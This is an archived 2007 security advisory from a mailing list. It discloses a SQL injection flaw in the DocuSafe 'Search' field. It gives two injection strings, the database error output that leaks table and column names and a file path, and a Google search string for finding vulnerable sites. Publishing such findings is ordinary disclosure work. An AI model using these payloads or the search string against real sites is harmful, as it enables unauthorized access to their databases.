Search (keywords):  SOFT ARTICLES TIPS & TRICKS SECURITY LINKS NEWS MAN DOCUMENTATION

<< Previous INDEX Search src / Print Next >>

Date: 13 Nov 2007 23:28:13 -0000
From: [email protected]
To: [email protected]
Subject: DocuSafe "Search" SQL Injection
X-Virus-Scanned: antivirus-gw at tyumen.ru

DocuSafe "Search" SQL Injection

Aria-Security Team,
http://Aria-Security.net
-------------------------------
Shout Outs: AurA, imm02tal
Vendor: http://gartha.net
Google Search: intitle:Corporate Contact System

insert your command in the section "search"
example:
'having 1=1--
Result:
[Microsoft][ODBC Microsoft Access Driver] Syntax error (missing operator) in query expression '(((tblMain.fldArtNr)

Like ''having 1=1--')) ORDER BY tblMain.fldArtNr, Max(tblMain.fldKDSrev) DESC'.

or
'group by tblMain.fldArtNr having 1=1--
result:

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'

[Microsoft][ODBC Microsoft Access Driver] Syntax error (missing operator) in query expression '(((tblMain.fldArtNr)

Like ''group by tblMain.fldArtNr having 1=1--')) ORDER BY tblMain.fldArtNr, Max(tblMain.fldKDSrev) DESC'.

/includes/common.asp, line 62


Regards,
The-0utl4w
Credits Goes To Aria-Security.Net

<< Previous INDEX Search src / Print Next >>

Партнёры:

Хостинг: